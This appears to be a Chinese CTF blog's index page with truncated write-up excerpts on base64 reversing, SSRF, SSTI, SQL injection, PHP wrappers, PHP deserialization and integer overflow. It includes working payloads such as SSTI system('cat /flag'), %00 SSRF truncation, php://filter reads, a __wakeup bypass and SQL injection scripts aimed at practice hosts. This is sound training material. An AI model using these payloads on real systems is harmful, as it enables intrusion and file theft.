常见简单加密算法逆向
常见简单加密算法逆向做题[HUBUCTF 2022 新生赛]simple_REbase64换表
没有研究清楚具体过程,技巧是看到$\mathrm{0x30}$、$\mathrm{0x3C}$、$\mathrm{0x3F}$即为base64(可能换表)
使用CyberChef进行解码
[SWPUCTF 2022 新生赛]base64base64解码
标准表,直接解码
[HDCTF 2023]easy_reupx脱壳,base64解密
[LitCTF 2023]enbase64base64换表
换表过程比较复杂,研究算法得表。
123456789101112131415161718#include <cstdio>#include <cstring>using namespace std;int v3[65];char Source[65]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",Destination[65];int main(void){ ...
Web入门-SSRF漏洞
Web入门-SSRF漏洞[GKCTF 2020]cve版签到SSRF漏洞,结合CVE-2020-7066:get_headers()会被%00截断。
payload:
1?url=http://127.0.0.123%00www.ctfhub.com
注,如下返回格式为get_headers()的特征:
123456789101112Array( [0] => HTTP/1.1 200 OK [1] => Date: Mon, 05 Jun 2023 12:32:32 GMT [2] => Server: Apache/2.4.38 (Debian) [3] => X-Powered-By: PHP/7.3.15 [4] => FLAG: NSSCTF{586773c7-706a-4413-9456-f3d363f47288} [5] => Vary: Accept-Encoding [6] => Content-Length: 113 [7] => Connectio ...
Web入门-Python相关
Web入门-Python相关做题[NISACTF 2022]babyuploadFlask题,os.path.join有个漏洞,当某个参数以“/”开头时,前面的参数一律忽略,然后从该参数后面认为是根目录下路径。
上传文件“/flag”,即服务端错误地读取根目录下的“flag”文件。
[LitCTF 2023]Flag点击就送!用Wappalyzer看看,发现为Flask:
1234from Wappalyzer import Wappalyzer,WebPagewappalyzer=Wappalyzer.latest()webpage=WebPage.new_from_url('http://node4.anna.nssctf.cn:28500/flag')print(wappalyzer.analyze(webpage))
看到HTTP请求头Cookie中有个Session,疑似Session伪造。
Flask的Session信息是存贮在客户端的,所以Flask通过一个secret_key防止Session被篡改的。
使用flask_sess ...
Web入门-SSTI模板注入攻击
Web入门-SSTI模板注入攻击做题[CISCN 2019华东南]Web11看到下方提示Smarty,即想到PHP的SSTI模板注入攻击。
右上角Current IP:后内容怀疑使用模板,内容来源于XFF请求头。
尝试修改请求头:
1X-Forwarded-For: {4*4}
看到回显16,确凿了,直接PHP执行:
1{system("cat /flag")}
[NISACTF 2022]midlevel重题。
[HDCTF 2023]SearchMaster1data={system("cat /flag_13_searchmaster")}
[HNCTF 2022 WEEK2]ez_SSTI一般SSTI参数先猜name,果然有,找到类_frozen_importlib_external.FileLoader的位置:
1http://node5.anna.nssctf.cn:28392/?name={{"".__class__.__bas ...
Web入门-JavaScript相关
Web入门-JavaScript相关做题[LitCTF 2023]1zjsJsFuck,在这里解密:http://codertab.com/JsUnFuck
[GDOUCTF 2023]hate eat snake找到alert函数,F12在控制台输入以下依赖函数:
1function _0x2615(){var _0x30b7fe=['C2vHCMnO','Dg9tDhjPBMC','DuLywKG','BgvUz3rO','CMv0DxjUicHMDq','y29UC29Szq','Aw5MBW','CM4GDgHPCYiPka','yvz6uuW','otuYnZiWwxDjwwHS','kcGOlISPkYKRkq','y29UC3rYDwn0BW','AZnYx2GWCgvFDa','ELvTAfO& ...
Web入门-SQL注入小结
Web入门-SQL注入小结做题[suctf 2019]EasySQL这题挺抽象的,正确解法是根据一段一段“Array([?]=>?)”的格式猜出有运算符“||”,然后改sql_mode使其成为字符串拼接运算符。
实际上这个后台语句为:
1select $post['query']||flag from Flag
exp:
1234import requestspayload1={'query':'1;set sql_mode=PIPES_AS_CONCAT;select 1'}response1=requests.post('http://node4.anna.nssctf.cn:28128/',data=payload1)print(response1.text[-47:-2])
注意最后一个“1”不能换成字母,否则就和字符串“flag”拼接起来了,在这里是分别查询“1”和“flag”值的意思。
[SWPUCTF 2021 新生赛]erro1sqlmap -u ht ...
Web入门-PHP伪协议
Web入门-PHP伪协议基础知识zip伪协议新建zip压缩文件并改名为xxxx.png,其中包含PHP一句话木马1.php,于是上传:
1?fp=zip://uploads/xxxx.png%231
其中%23为井号,后面1会补全为1.php。
做题[SWPUCTF 2021 新生赛]PseudoProtocolshint.php读取方法:
1?wllm=php://filter/read=convert.base64-encode/resource=hint.php
以文件形式读取:
1?a=data://text/plain,I want flag
exp:
12345678import requests,base64response1=requests.get('http://node4.anna.nssctf.cn:28518/index.php?wllm=php://filter/read=convert.base64-encode/resource=hint.php')tmp1=response1.text[-56:]tmp2=base64.b64 ...
Web入门-入门泛做题
Web入门-入门泛做题[LitCTF 2023]我Flag呢?略。
[LitCTF 2023]PHP是世界上最好的语言!!123456789101112from selenium import webdriverimport timebrowser=webdriver.Edge()browser.get('http://node5.anna.nssctf.cn:28327/')elem1=browser.find_element_by_id('php_code');elem1.send_keys("<?phpsystem(\"cat ../../../flag\");?>")elem2=browser.find_element_by_id('run');elem2.click()time.sleep(1)elem3=browser.find_element_by_id('run_result');print(elem3.text[-44:]);browse ...
Web入门-PHP反序列化漏洞
Web入门-PHP反序列化漏洞[SWPUCTF 2021 新生赛]no_wakeup反序列化时触发__wakeup函数,考虑绕开。
12345$aa = new HaHaHa();$aa->admin = "admin";$aa->passwd = "wllm";$stus = serialize($aa);print_r($stus); //O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
CVE-2016-7124:当参数列表中成员个数与实际不符时绕过__wakeup函数,构造:
1O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
...
PWN入门-整数溢出
PWN入门-整数溢出基础知识宽度溢出&整形提升12345678910111213141516171819#include <cstdio>void main(void){ int l=0xabcddcba; short s=l; char c=l; //宽度溢出 printf("l=0x%x(%d bits)\n",l,sizeof(l)*8); printf("s=0x%x(%d bits)\n",s,sizeof(s)*8); printf("c=0x%x(%d bits)\n",c,sizeof(c)*8); //整形提升 printf("s+c=0x%x(%d bits)\n",s+c,sizeof(s+c)*8); return 0;};/* l=0xabcddcba(32 bits) s=0xffffdcba(16 bits) c=0xffffffba(8 bits) s+ ...